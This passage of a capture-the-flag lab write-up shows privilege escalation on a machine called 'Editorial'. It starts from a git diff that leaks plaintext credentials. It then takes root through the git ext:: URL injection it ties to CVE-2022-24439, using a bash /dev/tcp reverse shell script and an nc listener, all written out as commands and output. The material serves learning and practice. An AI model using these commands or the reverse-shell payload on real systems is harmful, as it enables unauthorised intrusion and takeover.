- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
[2]+ Stopped git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8aeInside the logs, we are able to identify a second set of credential:
Username: prod
Password: 080217_Producti0n_2023!@Privilege Escalation
We will log into the secondary credentials and try to see if we can privilege escalate in any way.
dev@editorial:~$ su prod
Password:
prod@editorial:/home/dev$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *After running our sudo -l command on the secondary user, we are able to see that they can run root on this file /opt/internal_apps/clone_changes/clone_prod_change.py. However, running it directly will give us an error: Sorry, user prod is not allowed to execute '/opt/internal_apps/clone_changes/clone_prod_change.py' as root on editorial.
We will then look through the file to see what is inside this code:
prod@editorial:/home/dev$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])From the code, we are able to identify an vulnerability from 2022 → CVE-2022-24439 where due to improper user input validation allows for injection of malicious remote URL into the cloned command.
On our victim machine:
prod@editorial:/home/dev$ cd /tmp
prod@editorial:/tmp$ nano shell.sh
prod@editorial:/tmp$ cat shell.sh
#!/bin/bash
# Define your listener IP and port
LISTENER_IP="10.10.14.3"
LISTENER_PORT="4444"
# Create the reverse shell
bash -i >& /dev/tcp/$LISTENER_IP/$LISTENER_PORT 0>&1prod@editorial:/tmp$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'From there, we will open up a listener in our attacking machine:
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.20] 46936
root@editorial:/opt/internal_apps/clone_changes# whoami
whoami
root
root@editorial:/opt/internal_apps/clone_changes# cd /root
cd /root
root@editorial:~# cat root.txt
cat root.txt
78cc518157d660d544a7b2b44e1f8e5778cc518157d660d544a7b2b44e1f8e57
Last updated